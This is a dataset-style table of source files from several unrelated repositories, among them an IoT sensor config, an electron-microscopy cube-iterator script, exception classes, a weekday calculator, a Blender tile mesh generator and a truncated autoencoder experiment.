repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
stringlengths 5-92 | stringlengths 4-232 | stringclasses (19 values) | stringlengths 4-7 | stringlengths 721-1.04M | stringclasses (15 values) | int64 -9,223,277,421,539,062,000 to 9,223,102,107B | float64 6.51-99.9 | int64 15-997 | float64 0.25-0.97 | bool (1 class)
lnanhkhoa/thesis-iot-khoa | iot/data/configNode.py | 1 | 1711 |
databaseNode = {
"DateNow": "2017-01-05",
"TimeNow": "10:16:10",
"d": {
"dataNodeMaster01": {
"Device01": 0,
"Device02": 0,
"Device03": 0,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Device11": 0,
"Device12": 0,
"Sensor01": 28.9,
"Sensor02": 29.1,
"Sensor03": 0.0,
"Sensor04": 0.0,
"Sensor05": 0.0
},
"dataNodeSlave01": {
"Device01": 0,
"Device02": 0,
"Device03": 0,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Sensor01": 28.9,
"Sensor02": 0.0,
"Sensor03": 54.0,
"Sensor04": 24.0,
"Sensor05": 0.0,
"Sensor06": 0.0,
"Sensor07": 0.0,
"Sensor08": 0
},
"dataNodeSlave02": {
"Device01": 0,
"Device02": 0,
"Device03": 1,
"Device04": 0,
"Device05": 0,
"Device06": 0,
"Device07": 0,
"Device08": 0,
"Device09": 0,
"Device10": 0,
"Sensor01": 28.9,
"Sensor02": 29.1,
"Sensor03": 0.0,
"Sensor04": 0.0,
"Sensor05": 0.0,
"Sensor06": 6.0,
"Sensor07": 75.0,
"Sensor08": 0
}
},
"number": 1483586170
}
| apache-2.0 | -8,739,905,282,718,457,000 | 24.939394 | 29 | 0.354763 | false |
elhuhdron/emdrp | emdrp/emdrp/dpCubeIter.py | 1 | 19641 |
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2016 Paul Watkins, National Institutes of Health / NINDS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Generator class for creating chunk/size/offset/name information for hdf5 files
# containing blocks of supervoxels that overlap at the edges between blocks.
# This is the basis for "stitching" together blocks using an overlap method.
import argparse
import os
import numpy as np
class dpCubeIter(object):
LIST_ARGS = ['fileflags', 'filepaths', 'fileprefixes', 'filepostfixes', 'filemodulators',
'filepaths_affixes', 'filenames_suffixes', 'filemodulators_overlap']
TRUE_STRS = ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh']
#def __init__(self, inprefix, volume_range_beg, volume_range_end, overlap,
# cube_size=[1,1,1], left_remainder_size=[0,0,0], right_remainder_size=[0,0,0],
# chunksize=[128,128,128], leave_edge=False):
# # str - prefix for the name of the file
# self.inprefix = inprefix
# # (3,) int - beginning and end of ranges in chunks specified python-style
# self.volume_range_beg = np.array(volume_range_beg, dtype=np.int64)
# self.volume_range_end = np.array(volume_range_end, dtype=np.int64)
# # (3,) int - how much overlap in each direction in voxels
# self.overlap = np.array(overlap, dtype=np.int64)
# # (3,) int - size of each cube being stitched in chunks
# self.cube_size = np.array(cube_size, dtype=np.int64)
# # (3,) int - size of remainder edges on "left" and "right" sides for unaligned stitching in voxels
# self.left_remainder_size = np.array(left_remainder_size, dtype=np.int64)
# self.right_remainder_size = np.array(right_remainder_size, dtype=np.int64)
# # (3,) int - chunksize in voxels
# self.chunksize = np.array(chunksize, dtype=np.int64)
# # bool - whether to leave the overlap on the right edges
# self.leave_edge = bool(leave_edge)
def __init__(self, args):
# save command line arguments from argparse, see definitions in main or run with --help
for k, v in vars(args).items():
# do not override any values that are already set as a method of allowing inherited classes to specify
if hasattr(self,k): continue
if type(v) is list and k not in self.LIST_ARGS:
if len(v)==1:
setattr(self,k,v[0]) # save single element lists as first element
elif type(v[0]) is int: # convert the sizes and offsets to numpy arrays
setattr(self,k,np.array(v,dtype=np.int32))
else:
setattr(self,k,v) # store other list types as usual (floats)
else:
setattr(self,k,v)
# other inits
self.chunksize = self.use_chunksize
self.cube_size_voxels = self.cube_size * self.chunksize
self.left_remainder = self.left_remainder_size > 0; self.right_remainder = self.right_remainder_size > 0
self.volume_range = self.volume_range_end - self.volume_range_beg
assert( (self.volume_range % self.cube_size == 0).all() )
self.volume_step = self.volume_range // self.cube_size
self.volume_step += self.left_remainder; self.volume_step += self.right_remainder
self.volume_size = np.prod(self.volume_step)
# modulators default to all ones
self.nflags = len(self.fileflags)
# this is for the python interface mode (does not use the argument flag / file name creation stuff)
if self.nflags == 0: self.nflags = 1
if len(self.filemodulators) == 0:
self.filemodulators = np.ones((self.nflags,3),dtype=np.uint32)
else:
self.filemodulators = np.array(self.filemodulators,dtype=np.uint32).reshape((-1,3))
assert(self.filemodulators.shape[0] == self.nflags)
if len(self.filemodulators_overlap) == 0:
self.filemodulators_overlap = np.zeros((3,),dtype=np.uint32)
else:
self.filemodulators_overlap = np.array(self.filemodulators_overlap,dtype=np.uint32)
assert(self.filemodulators_overlap.size == 3)
# this is something of a hack to allow for creating hdf5s with overlaps from knossos-style cubes.
# xxx - probably not a good way to make this a lot cleaner without completely reimplementing emdrp
# data objects as knossos-style with compression and embedded overlap, make data more easily distributable
self.filemodulators_overlap_on = np.any(self.filemodulators_overlap > 0)
# did not see the point of omitting an overlap in just one dimension (unclear use case)
assert( not self.filemodulators_overlap_on or np.all(self.filemodulators_overlap > 0) )
if self.filemodulators_overlap_on:
# remainders and modulator overlaps are not designed to work together and also use case?
assert( not self.left_remainder.any() and not self.right_remainder.any() )
self.filemodulators_overlap_volume_range = self.volume_range - 2
assert( (self.filemodulators_overlap_volume_range % self.filemodulators[-1,:] == 0).all() )
self.filemodulators_overlap_volume_step_inner = \
self.filemodulators_overlap_volume_range // self.filemodulators[-1,:]
self.filemodulators_overlap_cube_size = self.filemodulators[-1,:] + 2
self.filemodulators_overlap_volume_step = self.filemodulators_overlap_volume_step_inner * \
self.filemodulators_overlap_cube_size
self.filemodulators_overlap_volume_size = np.prod(self.filemodulators_overlap_volume_step)
if len(self.filepaths_affixes) == 0:
self.filepaths_affixes = [False for x in range(self.nflags)]
else:
assert( len(self.filepaths_affixes) == self.nflags )
self.filepaths_affixes = [s.lower() in self.TRUE_STRS for s in self.filepaths_affixes]
if len(self.filenames_suffixes) == 0:
self.filenames_suffixes = [True for x in range(self.nflags)]
else:
assert( len(self.filenames_suffixes) == self.nflags )
self.filenames_suffixes = [s.lower() in self.TRUE_STRS for s in self.filenames_suffixes]
def __iter__(self):
if self.filemodulators_overlap_on:
# this is something of a hack to allow for creating hdf5s with overlaps from knossos-style cubes.
use_volume_size = self.filemodulators_overlap_volume_size
use_volume_step = self.filemodulators_overlap_volume_step
fm_cube_size = self.filemodulators_overlap_cube_size
else:
use_volume_size = self.volume_size
use_volume_step = self.volume_step
cur_ovlp = np.zeros((3,),dtype=np.int32)
for cur_index in range(use_volume_size):
# the current volume indices, including the right and left remainders
cur_volume = np.array(np.unravel_index(cur_index, use_volume_step), dtype=np.int64)
if self.filemodulators_overlap_on:
# this is basically a completely separate mode, consider as another script?
left_offset, is_left_border, is_right_border = [np.zeros((3,),dtype=np.int32) for i in range(3)]
is_left_remainder, is_right_remainder = [np.zeros((3,),dtype=bool) for i in range(2)]  # np.bool is removed in modern numpy
cur_fm_volume = cur_volume // fm_cube_size
cur_chunk = (cur_volume * self.cube_size) - 2*cur_fm_volume + self.volume_range_beg
cur_ovlp = np.zeros((3,),dtype=np.int32)
sel = (cur_volume % fm_cube_size == 0)
cur_ovlp[sel] = -self.filemodulators_overlap[sel] # "top" cube overlap
sel = (cur_volume % fm_cube_size == fm_cube_size-1)
cur_ovlp[sel] = self.filemodulators_overlap[sel] # "bottom" cube overlap
size = self.cube_size_voxels
else:
# need special cases to handle the remainders
is_left_border = cur_volume == 0; is_right_border = cur_volume == (self.volume_step-1)
is_left_remainder = np.logical_and(is_left_border,self.left_remainder)
is_right_remainder = np.logical_and(is_right_border,self.right_remainder)
is_not_left_remainder = np.logical_not(is_left_remainder)
#is_not_right_remainder = np.logical_not(is_right_remainder)
assert( not (np.logical_and(is_left_remainder, is_right_remainder)).any() ) # bad use case
# left and right remainders are offset from the start of the previous and last chunks respectively
cur_volume[is_not_left_remainder] -= self.left_remainder[is_not_left_remainder]
cur_chunk = cur_volume * self.cube_size + self.volume_range_beg
cur_chunk[is_left_remainder] -= self.cube_size[is_left_remainder]
left_offset = self.overlap.copy(); right_offset = self.overlap.copy();
if not self.leave_edge:
right_offset[is_right_border] = 0; left_offset[is_left_border] = 0
# default size is adding left and right offsets
size = self.cube_size_voxels + left_offset + right_offset
# special cases for remainder blocks
size[is_left_remainder] = self.left_remainder_size[is_left_remainder] + right_offset[is_left_remainder]
size[is_right_remainder] = self.right_remainder_size[is_right_remainder] + \
left_offset[is_right_remainder]
left_offset = -left_offset # default left offset is set negative as returned offset
# left offset for left remainder block is from the left side of previous cube
left_offset[is_left_remainder] = \
self.cube_size_voxels[is_left_remainder] - self.left_remainder_size[is_left_remainder]
# modified to allow for "modulators" which allows for chunk descriptors that only change at multiples of
# cube_size. allows for cubeiter to create command lines containing arguments with different cube_sizes
suffixes = [None] * self.nflags; affixes = [None] * self.nflags
for j in range(self.nflags):
fm = self.filemodulators[j,:]
if (fm==1).all():
mcur_chunk = cur_chunk
else:
if self.filemodulators_overlap_on:
mcur_chunk = cur_fm_volume*self.filemodulators[-1,:]*self.cube_size + self.volume_range_beg + 1
else:
mcur_chunk = (cur_volume // fm)*fm * self.cube_size + self.volume_range_beg
# create the name suffixes, path affixes
suffixes[j] = ''; affixes[j] = ''
for s,i in zip(['x','y','z'], range(3)):
r = 'l' if is_left_remainder[i] else ('r' if is_right_remainder[i] else '')
suffixes[j] += ('_%s%04d' % (s + r, mcur_chunk[i]))
affixes[j] = os.path.join(affixes[j], ('%s%04d' % (s, mcur_chunk[i])))
affixes[j] += os.path.sep
yield cur_volume, size, cur_chunk, left_offset, suffixes, affixes, is_left_border, is_right_border, cur_ovlp
def flagsToString(self, flags, paths, prefixes, postfixes, suffixes, affixes):
argstr = ' '
for flag, path, prefix, postfix, suffix, affix in zip(flags, paths, prefixes, postfixes, suffixes, affixes):
if flag != '0':
argstr += '--' + flag + ' '
# xxx - better names?
# affix is the optional knossos-style path (i.e., x0001/y0002/z0005)
# prefix is the specified file name without an extension or path
# suffix is the optional knossos-style addition to the filename (i.e., _x0001_y0002_z0005)
# postfix is the file extension
name = affix + prefix + suffix + postfix
if path != '0':
name = os.path.join(path,name)
argstr += name + ' '
return argstr
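# Sketch of one composed argument (hypothetical inputs, not values from this repo):
# with flag='--srcfile', path='/data', prefix='vol', postfix='.h5',
# suffix='_x0001_y0002_z0005' and affix='x0001/y0002/z0005/', flagsToString yields
#   --srcfile /data/x0001/y0002/z0005/vol_x0001_y0002_z0005.h5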
def printCmds(self):
if self.cmdfile:
with open(self.cmdfile, 'r') as myfile:
cmd = myfile.read().split('\n'); cmd = [x for x in cmd if x]
else:
cmd = [self.cmd]
ncmd = len(cmd)
cnt = 0
for volume_info in self:
_, size, cur_chunk, left_offset, suffixes, affixes, is_left_border, is_right_border, cur_ovlp = volume_info
ccmd = cmd[0] if ncmd == 1 else cmd[cnt]
str_volume = (' --size %d %d %d ' % tuple(size.tolist())) + \
(' --chunk %d %d %d ' % tuple(cur_chunk.tolist())) + \
(' --offset %d %d %d ' % tuple(left_offset.tolist()))
if self.filemodulators_overlap_on:
str_volume += (' --overlap %d %d %d ' % tuple(cur_ovlp.tolist()))
str_inputs = self.flagsToString(self.fileflags, self.filepaths, self.fileprefixes, self.filepostfixes,
[x if y else '' for x,y in zip(suffixes, self.filenames_suffixes)],
[x if y else '' for x,y in zip(affixes, self.filepaths_affixes)])
str_cmd = ccmd + ('' if self.no_volume_flags else str_volume) + str_inputs
if self.pre_cmd: str_cmd = self.pre_cmd + ';' + str_cmd
if self.post_cmd: str_cmd = str_cmd + ';' + self.post_cmd
print(str_cmd)
cnt += 1
@classmethod
def cubeIterGen(cls, volume_range_beg, volume_range_end, overlap, cube_size,
left_remainder_size=None, right_remainder_size=None, chunksize=None, leave_edge=None):
parser = argparse.ArgumentParser(description='cubeIterGen:dpCubeIter',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
dpCubeIter.addArgs(parser); arg_str = ''
arg_str += ' --volume_range_beg %d %d %d ' % tuple(volume_range_beg)
arg_str += ' --volume_range_end %d %d %d ' % tuple(volume_range_end)
arg_str += ' --overlap %d %d %d ' % tuple(overlap)
arg_str += ' --cube_size %d %d %d ' % tuple(cube_size)
if left_remainder_size is not None: arg_str += ' --left_remainder_size %d %d %d ' % tuple(left_remainder_size)
if right_remainder_size is not None: arg_str += '--right_remainder_size %d %d %d ' % tuple(right_remainder_size)
if chunksize is not None: arg_str += ' --use-chunksize %d %d %d ' % tuple(chunksize)
if leave_edge: arg_str += ' --leave_edge '
args = parser.parse_args(arg_str.split())
return cls(args)
@staticmethod
def addArgs(p):
# adds arguments required for this object to specified ArgumentParser object
p.add_argument('--cmdfile', nargs=1, type=str, default='',
help='Full name and path of text file containing command')
p.add_argument('--cmd', nargs=1, type=str, default='', help='Specify command on command line as string')
p.add_argument('--pre-cmd', nargs=1, type=str, default='',
help='Semi-colon delimited command to print before generated command')
p.add_argument('--post-cmd', nargs=1, type=str, default='',
help='Semi-colon delimited command to print after generated command')
# arguments that modulate each parameter that is being iterated by cubeiter
p.add_argument('--fileflags', nargs='*', type=str, default=[],
help='in/out files command line switches (0 for none)')
p.add_argument('--filepaths', nargs='*', type=str, default=[], help='in/out files paths (0 for none)')
p.add_argument('--fileprefixes', nargs='*', type=str, default=[], help='in/out files filename prefixes')
p.add_argument('--filepostfixes', nargs='*', type=str, default=[], help='in/out files filename postfixes')
p.add_argument('--filemodulators', nargs='*', type=int, default=[],
help='Allows for supervolumes at multiples of cube_size (x0 y0 z0 x1 y1 z1 ...)')
p.add_argument('--filemodulators-overlap', nargs='*', type=int, default=[],
help='Optional overlap (in voxels) for LAST modulator (x0 y0 z0 x1 y1 z1 ...)')
p.add_argument('--filepaths-affixes', nargs='*', type=str, default=[],
help='Whether to append suffix to each filepath (knossos-style, default false)')
p.add_argument('--filenames-suffixes', nargs='*', type=str, default=[],
help='Whether to append suffix to each filename (default true)')
p.add_argument('--volume_range_beg', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Starting range in chunks for total volume')
p.add_argument('--volume_range_end', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Ending range in chunks for total volume (python style)')
p.add_argument('--overlap', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Amount of overlap in each direction')
p.add_argument('--cube_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in chunks of iterate volume (superchunk)')
p.add_argument('--left_remainder_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in voxels of "left" remainder volumes')
p.add_argument('--right_remainder_size', nargs=3, type=int, default=[0,0,0], metavar=('X', 'Y', 'Z'),
help='Size in voxels of "right" remainder volumes')
p.add_argument('--use-chunksize', nargs=3, type=int, default=[128,128,128], metavar=('X', 'Y', 'Z'),
help='Size of chunks in voxels')
p.add_argument('--leave_edge', action='store_true', help='Specify to leave overlap at edges of volume range')
p.add_argument('--no_volume_flags', action='store_true',
help='Do not include chunk, size and offset flags in output')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate command lines for parallelized cube processing',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
dpCubeIter.addArgs(parser)
args = parser.parse_args()
ci = dpCubeIter(args)
ci.printCmds()
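# Usage sketch for the Python-interface mode (hypothetical values; cubeIterGen
# builds the argparse namespace itself, so no file flags are involved):
#
#   ci = dpCubeIter.cubeIterGen(volume_range_beg=[0, 0, 0],
#                               volume_range_end=[4, 4, 2],
#                               overlap=[16, 16, 16], cube_size=[2, 2, 2])
#   for cur_volume, size, cur_chunk, left_offset, _, _, _, _, _ in ci:
#       print(cur_chunk, size, left_offset)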
| mit | 3,392,337,723,787,381,000 | 60.378125 | 120 | 0.611832 | false |
oldm/OldMan | oldman/exception.py | 1 | 5501 |
#-------------------
# Abstract types
#-------------------
class OMError(Exception):
"""Root of exceptions generated by the oldman package expected HTTP ones."""
pass
class ModelGenerationError(OMError):
"""Error when generating a new model."""
pass
class OMRuntimeError(OMError):
"""Error at runtime after the initialization. """
#----------------------
# Main exception types
#----------------------
class OMSchemaError(ModelGenerationError):
"""Error in the schema graph and/or the JSON-LD context."""
pass
class OMUserError(OMRuntimeError):
"""Error when accessing or editing objects."""
pass
class OMDataStoreError(OMRuntimeError):
"""Error detected in the stored data."""
pass
class OMInternalError(OMError):
""" Do not expect it. """
pass
#------------------------------
# Controller (HTTP) exceptions
#------------------------------
class OMControllerException(Exception):
"""TODO: describe """
pass
class OMBadRequestException(OMControllerException):
"""TODO: describe
Error: 400
"""
class OMForbiddenOperationException(OMControllerException):
""" No chance
TODO: improve
"""
pass
class OMRequiredAuthenticationException(OMControllerException):
""" Try again
TODO: improve
"""
pass
class OMResourceNotFoundException(OMControllerException):
""" TODO: describe """
pass
class OMMethodNotAllowedException(OMControllerException):
""" 405 """
pass
class OMNotAcceptableException(OMControllerException):
""" 406 Not Acceptable
TODO: indicate the content-type
"""
pass
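# Sketch (an assumption, not part of this module): a controller would typically
# map these exceptions to HTTP status codes, e.g.
#   except OMBadRequestException: return 400
#   except OMMethodNotAllowedException: return 405
#   except OMNotAcceptableException: return 406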
#---------------------------------------------------------------------
# Pedantic exceptions
# For clarity
# No need to except them in a programmatic manner, prefer generic exceptions
#---------------------------------------------------------------------
class AlreadyAllocatedModelError(ModelGenerationError):
"""The class IRI or the short name of a new model is already allocated."""
pass
class OMPropertyDefError(OMSchemaError):
"""Inconsistency in the definition of a supported property."""
pass
class OMPropertyDefTypeError(OMPropertyDefError):
"""A RDF property cannot be both an ObjectProperty and a DatatypeProperty."""
pass
class OMAttributeDefError(OMSchemaError):
"""Inconsistency in the definition of a model class attribute."""
pass
class OMAlreadyDeclaredDatatypeError(OMAttributeDefError):
"""At least two different datatypes for the same attribute.
You may check the possible datatype inherited from the property (rdfs:range)
and the one specified in the JSON-LD context.
"""
pass
class OMReservedAttributeNameError(OMAttributeDefError):
"""Some attribute names are reserved and should not
be included in the JSON-LD context."""
pass
class OMUndeclaredClassNameError(ModelGenerationError):
"""The name of the model class should be defined in the JSON-LD context."""
pass
class OMExpiredMethodDeclarationTimeSlotError(ModelGenerationError):
"""All methods must be declared before creating a first model."""
pass
class OMEditError(OMUserError):
"""Runtime errors, occuring when editing or creating an object."""
pass
class OMAttributeTypeCheckError(OMEditError):
"""The value assigned to the attribute has wrong type."""
pass
class OMRequiredPropertyError(OMEditError):
"""A required property has no value."""
pass
class OMReadOnlyAttributeError(OMEditError):
"""End-users are not allowed to edit this attribute."""
pass
class OMUniquenessError(OMEditError):
"""Attribute uniqueness violation.
Example: IRI illegal reusing.
"""
pass
class OMWrongResourceError(OMEditError):
"""Not updating the right object."""
pass
class OMDifferentHashlessIRIError(OMEditError):
"""When creating or updating an object with a different hashless IRI is forbidden.
Blank nodes are not concerned.
"""
pass
class OMForbiddenSkolemizedIRIError(OMEditError):
"""When updating a skolemized IRI from the local domain is forbidden."""
pass
class OMRequiredHashlessIRIError(OMEditError):
"""No hash-less IRI has been given."""
pass
class OMUnauthorizedTypeChangeError(OMEditError):
"""When updating a resource with new types without explicit authorization."""
pass
class OMAccessError(OMUserError):
"""Error when accessing objects."""
pass
class OMAttributeAccessError(OMAccessError):
"""When such an attribute cannot be identified
(is not supported or no model has been found).
"""
pass
class OMClassInstanceError(OMAccessError):
"""The object is not an instance of the expected RDFS class."""
pass
class OMObjectNotFoundError(OMAccessError):
"""When the object is not found."""
pass
class OMHashIriError(OMAccessError):
"""A hash IRI has been given instead of a hash-less IRI."""
pass
class OMSPARQLError(OMAccessError):
"""Invalid SPARQL query given."""
pass
class OMSPARQLParseError(OMInternalError):
"""Invalid SPARQL request."""
pass
class OMAlreadyGeneratedAttributeError(OMInternalError):
"""Attribute generation occurs only once per SupportedProperty.
You should not try to add metadata or regenerate after that.
"""
pass
class UnsupportedDataStorageFeatureException(OMDataStoreError):
"""Feature not supported by the data store.""" | bsd-3-clause | 282,539,723,383,344,740 | 21.275304 | 86 | 0.681331 | false |
jeeyoungk/exercise | python/calendar.py | 1 | 1671 |
DAYS_IN_MONTH = [31,28,31,30,31,30,31,31,30,31,30,31]
DAYS_IN_MONTH_CUMULATIVE = [None for i in range(12)]
DOW = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']
# pre-calculate cumulative days till this month (not including this month).
for i in range(12):
if i == 0: DAYS_IN_MONTH_CUMULATIVE[i] = 0
else: DAYS_IN_MONTH_CUMULATIVE[i] = DAYS_IN_MONTH_CUMULATIVE[i-1] + DAYS_IN_MONTH[i-1]
def year_component(year):
year = year - 1 # don't count this year.
years = year
years4 = year / 4
years100 = year / 100
years400 = year / 400
nonleaps = years - years4 + years100 - years400
leaps = years - nonleaps
days = years * 365 + leaps
return days
def month_component(month):
return DAYS_IN_MONTH_CUMULATIVE[month - 1]
def day_component(day):
return day
def is_leap_year(y):
if y % 4 != 0: return False # normal year
if y % 100 != 0: return True # not every 100 years
if y % 400 != 0: return False # not every 400 years
return True
def weekday(year, month, day):
days = year_component(year) + month_component(month) + day_component(day)
if month > 2 and is_leap_year(year): days += 1
return DOW[(days) % 7]
print weekday(1301, 1, 1) == 'sat'
print weekday(1701, 1, 1) == 'sat'
print weekday(1799, 1, 1) == 'tues'
print weekday(1801, 1, 1) == 'thurs'
print weekday(1899, 1, 1) == 'sun'
print weekday(1901, 1, 1) == 'tues'
print weekday(1998, 1, 1) == 'thurs'
print weekday(1999, 1, 1) == 'fri'
print weekday(2013, 11, 1) == 'fri'
print weekday(2013, 1, 1) == 'tues'
print weekday(2017, 1, 31) == 'tues'
print weekday(2017, 2, 1) == 'wed'
print weekday(2017, 2, 2) == 'thurs'
| mit | -414,533,418,909,324,800 | 32.42 | 90 | 0.624177 | false |
feureau/Small-Scripts | Blender/Blender config/2.91/scripts/addons/bricker_v2-2-1/functions/brick/mesh_generators/tile.py | 1 | 4378 |
# Copyright (C) 2020 Christopher Gearhart
# [email protected]
# http://bblanimation.com/
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# System imports
import bpy
import bmesh
import math
import numpy as np
# Blender imports
from mathutils import Vector
# Module imports
from .generator_utils import *
def make_tile(dimensions:dict, brick_type:str, brick_size:list, circle_verts:int=None, type:str=None, detail:str="LOW", bme:bmesh=None):
"""
create tile brick with bmesh
Keyword Arguments:
dimensions -- dictionary containing brick dimensions
brick_type -- cm.brick_type
brick_size -- size of brick (e.g. standard 2x4 -> [2, 4, 3])
circle_verts -- number of vertices per circle of cylinders
type -- type of tile in ('TILE', 'TILE_GRILL')
detail -- level of brick detail (options: ('FLAT', 'LOW', 'HIGH'))
bme -- bmesh object in which to create verts
"""
# create new bmesh object
bme = bmesh.new() if not bme else bme
# get halfScale
d = Vector((dimensions["half_width"], dimensions["half_width"], dimensions["half_height"]))
d.z = d.z * (brick_size[2] if flat_brick_type(brick_type) else 1)
# get scalar for d in positive xyz directions
scalar = Vector((brick_size[0] * 2 - 1,
brick_size[1] * 2 - 1,
1))
d_scaled = vec_mult(d, scalar)
# get thickness of brick from inside to outside
thick_xy = dimensions["thickness"] - (dimensions["tick_depth"] if "High" in detail and min(brick_size) != 1 else 0)
thick = Vector((thick_xy, thick_xy, dimensions["thickness"]))
# create cube
if "GRILL" in type:
coord1 = -d
coord1.z += dimensions["slit_height"]
coord2 = d_scaled
coord2.z = coord1.z
v1, v4, v3, v2 = make_rectangle(coord1, coord2, face=False, bme=bme)[1]
else:
sides = [1, 1 if detail == "FLAT" else 0, 1, 1, 1, 1]
coord1 = -d
coord1.z += dimensions["slit_height"]
coord2 = d_scaled
v1, v2, v3, v4, v5, v6, v7, v8 = make_cube(coord1, coord2, sides, bme=bme)[1]
# make verts for slit
slit_depth = Vector([dimensions["slit_depth"]]*2)
coord1 = -d
coord1.xy += slit_depth
coord2 = Vector((d_scaled.x, d_scaled.y, -d.z + dimensions["slit_height"]))
coord2.xy -= slit_depth
v9, v10, v11, v12, v13, v14, v15, v16 = make_cube(coord1, coord2, [0, 1 if detail == "FLAT" and "GRILL" not in type else 0, 1, 1, 1, 1], bme=bme)[1]
# connect slit to outer cube
bme.faces.new((v14, v4, v1, v13))
bme.faces.new((v15, v3, v4, v14))
bme.faces.new((v16, v2, v3, v15))
bme.faces.new((v13, v1, v2, v16))
# add details
if "GRILL" in type:
if brick_size[0] < brick_size[1]:
add_grill_details(dimensions, brick_size, thick, scalar, d, v4, v1, v2, v3, v9, v10, v11, v12, bme)
else:
add_grill_details(dimensions, brick_size, thick, scalar, d, v1, v2, v3, v4, v9, v10, v11, v12, bme)
elif detail != "FLAT":
# making verts for hollow portion
coord1 = -d + Vector((thick.x, thick.y, 0))
coord2 = vec_mult(d, scalar) - thick
v17, v18, v19, v20, v21, v22, v23, v24 = make_cube(coord1, coord2, [1, 0, 1, 1, 1, 1], flip_normals=True, bme=bme)[1]
# connect hollow portion to verts for slit
bme.faces.new((v18, v17, v9, v10))
bme.faces.new((v19, v18, v10, v11))
bme.faces.new((v20, v19, v11, v12))
bme.faces.new((v17, v20, v12, v9))
# add supports
if max(brick_size[:2]) > 2:
add_supports(dimensions, dimensions["height"], brick_size, brick_type, circle_verts, type, detail, d, scalar, thick, bme)
return bme
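# Usage sketch (the dimension values below are illustrative placeholders, not
# the real Bricker-computed dimensions):
#
#   dims = {"half_width": 4.0, "half_height": 4.8, "thickness": 0.8,
#           "tick_depth": 0.3, "slit_height": 0.3, "slit_depth": 0.3,
#           "height": 9.6}
#   bm = make_tile(dims, "BRICKS", [1, 2, 1], circle_verts=16,
#                  type="TILE", detail="FLAT")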
| gpl-3.0 | -8,467,515,662,449,953 | 39.165138 | 152 | 0.620603 | false |
lmjohns3/manifold-experiment | en-dee.py | 1 | 6947 |
import climate
import lmj.plot
import logging
import numpy as np
import sklearn.decomposition
import theanets
climate.add_arg('--dimensions', type=int, default=10, metavar='D')
climate.add_arg('--samples', type=int, default=1000, metavar='N')
climate.add_arg('--clusters', type=int, default=20, metavar='K')
climate.add_arg('--features', type=int, default=20, metavar='F')
climate.add_arg('--viscosity', type=float, default=0.9, metavar='V')
climate.add_arg('--plot-pcs', type=int, nargs='+', metavar='K')
climate.add_arg('--plot-dimensions', type=int, nargs='+', metavar='D')
climate.add_arg('--plot-features', type=int, nargs='+', metavar='F')
climate.add_arg('--seed', type=int, metavar='S')
climate.add_arg('--hidden-l1', type=float, default=0, metavar='V')
climate.add_arg('--input-noise', type=float, default=0, metavar='V')
climate.add_arg('--hidden-dropout', type=float, default=0, metavar='V')
climate.add_arg('--activation', default='relu', metavar='A')
TAU = 2 * np.pi
def angle_between(sumsq, radius):
return abs(np.arccos(sumsq / np.sqrt(sumsq) / radius))
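# Note on angle_between: sumsq / sqrt(sumsq) == sqrt(sumsq), so the value is
# arccos(|v| / radius) for a vector v whose squared norm is `sumsq`.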
def create_dataset(args):
cov = 0.2 * np.eye(args.dimensions)
acc = np.random.randn(args.dimensions)
acc /= np.linalg.norm(acc)
vel = np.random.randn(args.dimensions)
vel /= np.linalg.norm(vel)
mus = [np.zeros(args.dimensions)]
dataset = []
for _ in range(args.clusters):
acc *= 1 - args.viscosity
acc += args.viscosity * np.random.randn(args.dimensions)
acc /= np.linalg.norm(acc)
vel += acc
vel /= np.linalg.norm(vel)
old = mus[-1]
new = mus[-1] + vel
dataset.extend(np.random.multivariate_normal(
(old + new) / 2, cov, args.samples // args.clusters))
mus.append(new)
return dataset
def plot_feature(ax, xs, ys, ux, uy, bias, length, name):
theta = angle_between(ux * ux + uy * uy, length)
if theta > TAU / 8:
return
c = ['#d62728', '#ff7f0e'][bias < 0]
ax.plot(xs, (ux * xs + bias) / -uy, '-', color=c, lw=2, alpha=0.9)
if abs(ux / uy) < 1:
z1, z2 = np.random.random(2) < 0.5
x = xs[[-5, 5][z1]]
y = (ux * x + bias) / -uy
dx = [-20, 20][z1]
dy = [-20, 20][z2]
rad = z1 ^ z2
else:
